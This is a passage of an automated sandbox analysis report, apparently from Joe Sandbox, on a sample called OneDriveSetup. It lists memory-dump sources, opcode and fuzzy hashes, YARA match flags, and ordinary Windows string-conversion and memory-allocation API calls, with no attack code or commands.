                                                                                                                                                                        • Opcode Fuzzy Hash: 48c6f2e34713121967834c161c2b0d2e3a06ccc3fe10ab81fbfb9183dc6f1419
                                                                                                                                                                        • Instruction Fuzzy Hash: 24C1B378E01218CFDB14DFA5C984B9DBBB2BF89300F5081AAD809AB355DB359E85CF51
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 9ada6737ebb37d8e2f0d8e2669321ba727e18a185b305d6cbef1ee5e30426b0c
                                                                                                                                                                        • Instruction ID: a9c58102fee6bf5f0ac358686c5d1a9231f1f8198b59de6d9d129e0fbb2e6969
                                                                                                                                                                        • Opcode Fuzzy Hash: 9ada6737ebb37d8e2f0d8e2669321ba727e18a185b305d6cbef1ee5e30426b0c
                                                                                                                                                                        • Instruction Fuzzy Hash: 08C1B474E01218CFEB14DFA5C984B9DBBB2BF89300F5081AAD809AB355DB355E86CF51
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: c7fc0791c3ecd844a6462cf6ec501d5673df9c35cc64e82c19f7e4cc415830ac
                                                                                                                                                                        • Instruction ID: 4f3fe1ba22a6400b067eff92ca6adc52d28af66e978e531d20be4a6cce92d06d
                                                                                                                                                                        • Opcode Fuzzy Hash: c7fc0791c3ecd844a6462cf6ec501d5673df9c35cc64e82c19f7e4cc415830ac
                                                                                                                                                                        • Instruction Fuzzy Hash: 47C1C374E01218CFEB14DFA5C984B9DBBB2BF89300F5081AAD809AB355DB355E86CF51
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 42a16ef2eef35a823c1a28b3bd3f6937172ed7ab0e4ccefd4a2362e15fe46457
                                                                                                                                                                        • Instruction ID: bf92ff92b4cf5919606714d9dfb5ed53e36c8cc14d653cae1eea3222dadf1475
                                                                                                                                                                        • Opcode Fuzzy Hash: 42a16ef2eef35a823c1a28b3bd3f6937172ed7ab0e4ccefd4a2362e15fe46457
                                                                                                                                                                        • Instruction Fuzzy Hash: E291C471E042198BDF14DFBAC994BAEBBF2BFC8210F14856AD845A7390DB359D05CB50
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 9631f109f6b93e19ae09bfad7bbcc3ec931d449776a70971bbd4ddf9ffaebfce
                                                                                                                                                                        • Instruction ID: 01fc9b25a1c03a9d5c240cb75a805105d2b65830aef2223b217ea412b8a1a791
                                                                                                                                                                        • Opcode Fuzzy Hash: 9631f109f6b93e19ae09bfad7bbcc3ec931d449776a70971bbd4ddf9ffaebfce
                                                                                                                                                                        • Instruction Fuzzy Hash: 76B10471D106598EDB11DFA9C844ADDFBB1FF89300F10C2AAE458A7261EB709A85CF81
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                         • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 519d71d31dfe2b71d65c539f7253ce4d0ce1a0c509a5eaaf561cac07154b4855
                                                                                                                                                                        • Instruction ID: 74c1b90a01db230de662c72faab58802bb742d928f34651097fec506a9751401
                                                                                                                                                                        • Opcode Fuzzy Hash: 519d71d31dfe2b71d65c539f7253ce4d0ce1a0c509a5eaaf561cac07154b4855
                                                                                                                                                                        • Instruction Fuzzy Hash: 15717072A9155347E39CCF5CECD17763713DBC5351F49C23ACA025B6EAC938A922C688
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 0e63efac7e2ebb68c7ebbb969a4763366cb0a8901c924365fad2da272d118e1a
                                                                                                                                                                        • Instruction ID: 0d96634b8707ad8609b195fa73024e76167e226ca7276497f0c82973fd674192
                                                                                                                                                                        • Opcode Fuzzy Hash: 0e63efac7e2ebb68c7ebbb969a4763366cb0a8901c924365fad2da272d118e1a
                                                                                                                                                                        • Instruction Fuzzy Hash: 6D91B274E00258CFEB14DFA9C894BADBBB2FF88301F60812AD815AB394DB355946DF51
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 2334eeaa7819e5798c349cd91c05436e918a88207dc18b56eee61b21f059fb5e
                                                                                                                                                                        • Instruction ID: 9deebb96f3ba2c2d4084a661abcdc5286bf422794dd9f29c096f4e6fcaf227e8
                                                                                                                                                                        • Opcode Fuzzy Hash: 2334eeaa7819e5798c349cd91c05436e918a88207dc18b56eee61b21f059fb5e
                                                                                                                                                                        • Instruction Fuzzy Hash: E5A17B74A01228CFDB64DF24C954B9ABBB2BB89301F5085EAD84EA7350DB359E81CF51
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                         • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 56d4400f77c04dc4446d24fbb084ed78fa0beaad766ef6ff58d44a670f1be69a
                                                                                                                                                                        • Instruction ID: e93c334361593eb17f37b37ed9e80cdb2c00b1b1e1af3e0e9a736190e966ddef
                                                                                                                                                                        • Opcode Fuzzy Hash: 56d4400f77c04dc4446d24fbb084ed78fa0beaad766ef6ff58d44a670f1be69a
                                                                                                                                                                        • Instruction Fuzzy Hash: 4A615E3266055747E391DF6DEEC47663762EBC9351F18C630CA008B6A6CB39B92297CC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 55630372c0c92682820f07c56045acdf6e0013c4bb7b5b20ec175c90ded821bf
                                                                                                                                                                        • Instruction ID: 46089f83a5985b792a9e6f5f769d5c88a7fc57844c7a5798c880708cbd5f1ece
                                                                                                                                                                        • Opcode Fuzzy Hash: 55630372c0c92682820f07c56045acdf6e0013c4bb7b5b20ec175c90ded821bf
                                                                                                                                                                        • Instruction Fuzzy Hash: 6E710474E05259CFEB29CF66D880BADBBB2BF89200F10C0AAC409A7355DB315D86DF11
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: a53505e734577e6b0c17e8ecfe2c9dfc049cfae8ff836dbc5ba50c8abffcbaea
                                                                                                                                                                        • Instruction ID: 926baa89377372493d35bfbeddbd551b40f3c13596fca5f696d9b48a661f5c5f
                                                                                                                                                                        • Opcode Fuzzy Hash: a53505e734577e6b0c17e8ecfe2c9dfc049cfae8ff836dbc5ba50c8abffcbaea
                                                                                                                                                                        • Instruction Fuzzy Hash: EB4108B5D01218DBEB18CFAAD8887DEBBF2BF89314F14C12AD448BA294DB744545CF51
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 03d588890c509121d5b668287bf50561538ccb95c6fa6acbc001ed1ec100aa83
                                                                                                                                                                        • Instruction ID: 2e0f30ee6c5b0322b1b2bef415a5b6c8926110ddc99e6dc068a1dd70c5dee7c4
                                                                                                                                                                        • Opcode Fuzzy Hash: 03d588890c509121d5b668287bf50561538ccb95c6fa6acbc001ed1ec100aa83
                                                                                                                                                                        • Instruction Fuzzy Hash: F2519074A01228CFDB64DF24D854B99BBB2FF4A301F5095EAD80AA7350DB359E81CF50
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                         • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: f84f8abda09efbfc4fc50908dec446613bf2f52d635c093d4d9c5e236f650133
                                                                                                                                                                        • Instruction ID: 39afabd8a370e1aacf823bb5b0eb141e0e266d105c364ee31248ba7b153c19f0
                                                                                                                                                                        • Opcode Fuzzy Hash: f84f8abda09efbfc4fc50908dec446613bf2f52d635c093d4d9c5e236f650133
                                                                                                                                                                        • Instruction Fuzzy Hash: 2851F94400D7E18EC716873A44E0AA7BFD10FAB115F4E9ACDA5E90B2E3C159C288DB77
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: f2aef9f72dfb6b2d5cd6141a6a2ab3686a70e8882c093080711f9bebdaf0839b
                                                                                                                                                                        • Instruction ID: 6ff46d24645ba8548adb64656fcd510ffbb21e5b774f5708cdbaea6c6e64c9ab
                                                                                                                                                                        • Opcode Fuzzy Hash: f2aef9f72dfb6b2d5cd6141a6a2ab3686a70e8882c093080711f9bebdaf0839b
                                                                                                                                                                        • Instruction Fuzzy Hash: 4541D7B0E01248CBDB18DFAAD954ADEBBF2BF89300F64C12AC855BB255DB355946CF40
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: a057bacc964e19398250e32723e23cdd66164baa24b0e82dacb2deee46a550f3
                                                                                                                                                                        • Instruction ID: 516829c472ed43919beec3d1e9cea1b9311fdb363c9d958710b7e775e015aa8d
                                                                                                                                                                        • Opcode Fuzzy Hash: a057bacc964e19398250e32723e23cdd66164baa24b0e82dacb2deee46a550f3
                                                                                                                                                                        • Instruction Fuzzy Hash: D141C774E01248CBEB18DFA6D854ADEBBF2BF89300F64C12AC815BB254DB355946CF50
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 5804b07f674ae3d268ec1438c7da71b35f3107e62f64f1f633515dfb68ee091a
                                                                                                                                                                        • Instruction ID: cff114a85fcb8f5deb46d81d22c4208fa3965af46b01a687ebeadebabb5a60ab
                                                                                                                                                                        • Opcode Fuzzy Hash: 5804b07f674ae3d268ec1438c7da71b35f3107e62f64f1f633515dfb68ee091a
                                                                                                                                                                        • Instruction Fuzzy Hash: 9A31D8302052028BE738CE19C954BEBB3B5AFC0349F44883ED986A73C4DABDD945D795
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 8ecd276667299f36745ae2715909230c30f6560172292fc445dd1be086e6875c
                                                                                                                                                                        • Instruction ID: cc1041d98cbfec60456d76cffb7a23555082d3618c66899080c411643d45ffbc
                                                                                                                                                                        • Opcode Fuzzy Hash: 8ecd276667299f36745ae2715909230c30f6560172292fc445dd1be086e6875c
                                                                                                                                                                        • Instruction Fuzzy Hash: 8741E574E01248CBDB18DFAAD854ADEBBB2BF89300F60C12AC815BB254EB355946CF40
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: c978e5928db991ac6d07e932081a262d83a0fa98aa86e76271b7c9b89aef177d
                                                                                                                                                                        • Instruction ID: 7c44d78d582216a315bf985603c3bb6c4050d3b3edc7744d7e8cd3291394e396
                                                                                                                                                                        • Opcode Fuzzy Hash: c978e5928db991ac6d07e932081a262d83a0fa98aa86e76271b7c9b89aef177d
                                                                                                                                                                        • Instruction Fuzzy Hash: B141D374E01248CBEB18DFAAD8546DDBBF2BF89300F64C12AC859AB254DB354946CF40
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: aa0077415f9093ab0413873195ca4004a95b1d58f6168ef5cba9875dba42719c
                                                                                                                                                                        • Instruction ID: 19d129435270cabffe6529b74ccd28e9caae8a9684ac196ca1b70d326a9157c5
                                                                                                                                                                        • Opcode Fuzzy Hash: aa0077415f9093ab0413873195ca4004a95b1d58f6168ef5cba9875dba42719c
                                                                                                                                                                        • Instruction Fuzzy Hash: 3F41E574E01248CBDB18DFA6D854ADEBBF2BF88300F64C12AD815BB254DB355946CF50
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: ce802b1398fd477e86a7e3152d09f36335f302be52c044939223cd5acc1530d1
                                                                                                                                                                        • Instruction ID: 40a5f1d51fa13595d10c6a7fcc00bd06902cd6d414a5636ccb89dfae7b8859e3
                                                                                                                                                                        • Opcode Fuzzy Hash: ce802b1398fd477e86a7e3152d09f36335f302be52c044939223cd5acc1530d1
                                                                                                                                                                        • Instruction Fuzzy Hash: 6A41C474E01248CBEB18DFEAD854ADEBBB2BF89300F60D12AC815BB255DB345946CF54
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 753c0a5e7afed747bcf943f5d291ff817eae7f9bad7ad66daed2663d67039c0b
                                                                                                                                                                        • Instruction ID: 37d5d4c21b90fb75f6b7674394200e474e38248421bc85b5d799eb47e8a4e631
                                                                                                                                                                        • Opcode Fuzzy Hash: 753c0a5e7afed747bcf943f5d291ff817eae7f9bad7ad66daed2663d67039c0b
                                                                                                                                                                        • Instruction Fuzzy Hash: ED41B474D01648CBEB18DFE6D454A9EBBF2BF89300F60D12AC819BB254EB345946CF54
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 37463fa5c3c0cabb1b42702fc66f2bf3f0cf326d92fdb85873fa5186a4c9fba4
                                                                                                                                                                        • Instruction ID: 72e267b576442cbd5a5e4134b913c35437fc1624452795b55928a27c040eee08
                                                                                                                                                                        • Opcode Fuzzy Hash: 37463fa5c3c0cabb1b42702fc66f2bf3f0cf326d92fdb85873fa5186a4c9fba4
                                                                                                                                                                        • Instruction Fuzzy Hash: 4641B270E01248CBEB18DFAAD854ADDBBF2BF89300F60D12AC819BB254DB344946CF44
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 20f2cbd28064e9c6383008194126ae92155174940ea0fe37ac78e894de72060f
                                                                                                                                                                        • Instruction ID: f91b3ff8600359d3e3f6de156c5c0a591c77190e236b640bde285d7830cad0c3
                                                                                                                                                                        • Opcode Fuzzy Hash: 20f2cbd28064e9c6383008194126ae92155174940ea0fe37ac78e894de72060f
                                                                                                                                                                        • Instruction Fuzzy Hash: 0841C5B4E01248CBDB18DFAAC854ADDBBF2BF89300F60C12AC819BB254DB355946CF50
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 9961543af999a1320c5b9d9b8c59a9b64f893fc8dbb42675723320a25693eab2
                                                                                                                                                                        • Instruction ID: 40597224e526abc728bb10992f322fa75c91b34d76fbbe6bc80328d1c420bfc2
                                                                                                                                                                        • Opcode Fuzzy Hash: 9961543af999a1320c5b9d9b8c59a9b64f893fc8dbb42675723320a25693eab2
                                                                                                                                                                        • Instruction Fuzzy Hash: F321923170520247EB68C929C9547ABB3A5ABC0389F48853EC986A73C8DAB9E941D785
                                                                                                                                                                        APIs
                                                                                                                                                                        • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,08531950), ref: 004170C5
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                                                                                                        • _malloc.LIBCMT ref: 0041718A
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                                                                                                        • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                                                                                                        • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                                                                                                        • _malloc.LIBCMT ref: 0041724C
                                                                                                                                                                        • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                                                                                                        • __freea.LIBCMT ref: 004172A4
                                                                                                                                                                        • __freea.LIBCMT ref: 004172AD
                                                                                                                                                                        • ___ansicp.LIBCMT ref: 004172DE
                                                                                                                                                                        • ___convertcp.LIBCMT ref: 00417309
                                                                                                                                                                        • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                                                                                                        • _malloc.LIBCMT ref: 00417362
                                                                                                                                                                        • _memset.LIBCMT ref: 00417384
                                                                                                                                                                        • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                                                                                                        • ___convertcp.LIBCMT ref: 004173BA
                                                                                                                                                                        • __freea.LIBCMT ref: 004173CF
                                                                                                                                                                        • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3809854901-0
                                                                                                                                                                        • Opcode ID: 3d09e5343aa18fab3ca4e2e74db44cf1cccdb49efdd84c094ede33f31d65ba6e
                                                                                                                                                                        • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                                                                                                        • Opcode Fuzzy Hash: 3d09e5343aa18fab3ca4e2e74db44cf1cccdb49efdd84c094ede33f31d65ba6e
                                                                                                                                                                        • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                                                                                                        APIs
                                                                                                                                                                        • _malloc.LIBCMT ref: 004057DE
                                                                                                                                                                          • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                                                          • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                                                          • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                                                        • _malloc.LIBCMT ref: 00405842
                                                                                                                                                                        • _malloc.LIBCMT ref: 00405906
                                                                                                                                                                        • _malloc.LIBCMT ref: 00405930
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmp
